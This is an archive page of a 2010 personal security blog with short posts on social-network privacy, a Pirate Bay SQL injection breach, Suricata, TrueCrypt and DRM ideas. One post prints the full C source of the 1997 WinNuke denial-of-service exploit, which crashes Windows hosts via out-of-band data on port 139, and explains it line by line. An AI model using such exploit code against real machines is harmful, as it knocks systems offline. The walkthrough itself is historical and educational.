Irregular Expressions


July 9, 2010  8:19 AM

Do you really know your friends?



Posted by: Dan O'Connor
facebook security, linkedin security, privacy, robin sage

I have thought about this for many years with Facebook and LinkedIn.  How many of the people on your friend list have you actually checked to see that they are, who they say they are?

How many are old friends that you just added but did not really have a conversation with, or did have one that was common knowledge?

It does not take a whole lot of information to get your email password reset.  With the basic information from a facebook profile, you can start to collect the necessary information to gain access to email accounts.

Anything posted on the internet should be treated as such, you might as well write it on a billboard.

So someone tried the same thing with members of the DOD and other arms of the US gov, I don’t want to spoil this one, so head over and check it out.

http://www.darkreading.com/insiderthreat/security/privacy/showArticle.jhtml?articleID=225702468

July 8, 2010  11:50 AM

thepiratebay.org



Posted by: Dan O'Connor
SQL injection, thepiratebay.org

There appears to have been more then a few SQL injection vulnerabilities on thepiratebay.org,

http://krebsonsecurity.com/2010/07/pirate-bay-hack-exposes-user-booty/

The group responsible says that none of the information gained was sold or disseminated.  Still if you had an account there I would change your password and I hope that you have not been doing something that you should not have been.


July 5, 2010  1:12 PM

Xen vs VMWare



Posted by: Dan O'Connor
vmware, vmware performance, xen, xen performance, xen vs vmware

This is a little older then I would like, but I have not been able to find anything else like this document.

www.vmware.com/pdf/hypervisor_performance.pdf

This is a Xen head-to-head with ESX 3.0.1, it compare performance in compiling and gzip just to name a few.

Very interesting, even if it is a little old.


July 2, 2010  12:39 PM

Suricata 1.0 release



Posted by: Dan O'Connor
ids, ids/ips, ips, suricata

The 1.0 release of the Suricata IPS/IDS has been released, you can get it here.

http://www.openinfosecfoundation.org/index.php/download-suricata


June 30, 2010  11:56 AM

An ounce of prevetion



Posted by: Dan O'Connor
truecrypt

It always pays to encrypt your disk.

http://www.theregister.co.uk/2010/06/28/brazil_banker_crypto_lock_out/

I don’t know if I would call him a smart criminal but at least it sounds like he out smarted the authorities and the FBI.

By the way he is using TrueCrypt, one of my favorites, it can be found at truecrypt.org.


June 30, 2010  12:05 AM

winnuke.c



Posted by: Dan O'Connor
exploit, winnuke.c

Ok here is the code that was at the like I posted previously ( it is posted at the bottom of this).

I am pretty sure this is the right code, line 1 has the author _eci. Wikipedia as an article on it and it lists the name person as the poster of the code.

I am still not an expert in c but I can read the code and point things of interest as we go and see if I can explain them a bit.

Lines 5-11 are includes that are pulling in the needed code that is needed. Some of the ones of note would be 8 and 10, netinet and socket.

13 is setting up the destination port, 139 in this case.

15 – 18 is the declaration of variables and structures.

21 is the start of sub called open_sock that is going to be making the connection out. ( If you are really interested in creating sockets there is great examples to be found on google.)

On line 59 you can see the call to the sub with some variables. open_sock(<the name of the socket>, <the target>, <the destination port>)

Line 62 is the attack, send(<the name of the socket>, <the message to send>, <the length of the message>, <additional flags>). The payload is “Bye”, but the message is irrelevant. The important part is the additional flags, MSG_OOB. MSG_OOB is the signal in the TCP header that this is out of band, and that is exactly what causes the system to blue screen.

Ta Da!

( it was here if you did not get it –> neil.franklin.ch/Info_Texts/winnuke.c )

1 /* winnuke.c - (05/07/97)  By _eci  */
2 /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
3
4
5 #include <stdio.h>
6 #include <string.h>
7 #include <netdb.h>
8 #include <netinet/in.h>
9 #include <sys/types.h>
10 #include <sys/socket.h>
11 #include <unistd.h>
12
13 #define dport 139  /* Attack port: 139 is what we want */
14
15 int x, s;
16 char *str = "Bye";  /* Makes no diff */
17 struct sockaddr_in addr, spoofedaddr;
18 struct hostent *host;
19
20
21 int open_sock(int sock, char *server, int port) {
22     struct sockaddr_in blah;
23     struct hostent *he;
24     bzero((char *)&blah,sizeof(blah));
25     blah.sin_family=AF_INET;
26     blah.sin_addr.s_addr=inet_addr(server);
27     blah.sin_port=htons(port);
28
29    if ((he = gethostbyname(server)) != NULL) {
30       bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
31    }
32    else {
33         if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
34           perror("gethostbyname()");
35           return(-3);
36         }
37    }
38
39        if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
40             perror("connect()");
41             close(sock);
42             return(-4);
43        }
44        printf("Connected to [%s:%d].\n",server,port);
45        return;
46 }

47 void main(int argc, char *argv[]) {
48
49     if (argc != 2) {
50       printf("Usage: %s <target>\n",argv[0]);
51       exit(0);
52     }
53
54     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
55        perror("socket()");
56        exit(-1);
57     }
58
59     open_sock(s,argv[1],dport);
60
61     printf("Sending crash... ");
62       send(s,str,strlen(str),MSG_OOB);
63       usleep(100000);
64     printf("Done!\n");
65     close(s);
66 }


June 29, 2010  11:26 PM

A little more histroy



Posted by: Dan O'Connor
winnuke, winnuke 97, winnuke.c

Do you remember your first WinNuke?

I sure do, in 1997 when the code for WinNuke was floating around a Netscape and very blinkie and animated gif Internet.  At the time I was spending way to much time playing Tie Fighter and War Craft I or II, but I did find some spare time to mess with the WinNuke code.

I wish I had kept the code for the one that I was messing with, I remember the setup of being able to enter a whole subnet and not just individual hosts. Times where good and exploit code was simple!

I did find a link to what looks like the original code.

neil.franklin.ch/Info_Texts/winnuke.c

I think this a great example to do a walk through, take a look at the posted code. Part 2 is going to have a detailed step through.

Nothing like watching a whole lab of computers all going blue :)


June 29, 2010  11:04 PM

A little history



Posted by: Dan O'Connor
Hacker Manifesto

I was checking some of my favorite places to get new exploits for meatsploit and I stumbled on a posting of the hackers manifesto!

That sure makes me thing, I tend to forget when life was like even before I had a modem and we and to move data around using our sneaker net.  That’s when I found out that putting floppies in your pocket when its -40c outside does not really do much for you if you ever want to get that data back off!

It gets me all nostalgic thinking about the first BBS’s I started to use, and the games that were on there.  Man do I miss dialing up and playing LORD at 11:45 and then sitting on the line until 12 so I could get a second turn.

http://en.wikipedia.org/wiki/Hacker_Manifesto


June 27, 2010  10:36 PM

Building a better DRM



Posted by: Dan O'Connor
drm, pki, software protection

Implementing DRM or software protection can be a very challenging task.  The overall goal is to protect the item in question, you want to stop it from being copied and or redistributed to individuals or entities that should not have access to it.

Or is it?

When you really start to think about what you are doing in a DRM setup, it starts in my opinion to look like another problem that we have solved already.  To me DRM looks a like something that can be done very well with a PKI system.

Users could be given a cert that will be tied to a unique account that will allow them access to the system, this can also have a username and password or a fab to go along with it.  Of course this also requires that the device or software in question be allowed to phone home and check in, but when you start to think about it that can be solved too.

Just a thought that I have been bouncing around for a while.


June 26, 2010  9:58 PM

French hacker given suspended sentence for Twitter hacking



Posted by: Dan O'Connor
obama twitter hack, twiiter hack

The French hacker the compromised Obama’s twitter account amongst others has only been given a 5 month suspended sentence.  While what he accessed and did with the access was not serious, I think the reasoning that was given is a load of bollocks.  Also the what he could have done with the access could have really messed something up.  If he had sent messages as Obama, given the current economic situation it could have triggered problems with the stock market and caused a real problem.

I really wish there was more done to people that do this, it start to set a really bad trend when they are handed such lite sentences.

The full story as on yahoo news below.

http://news.yahoo.com/s/ap/20100625/ap_on_hi_te/eu_france_twitter_hacker


Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: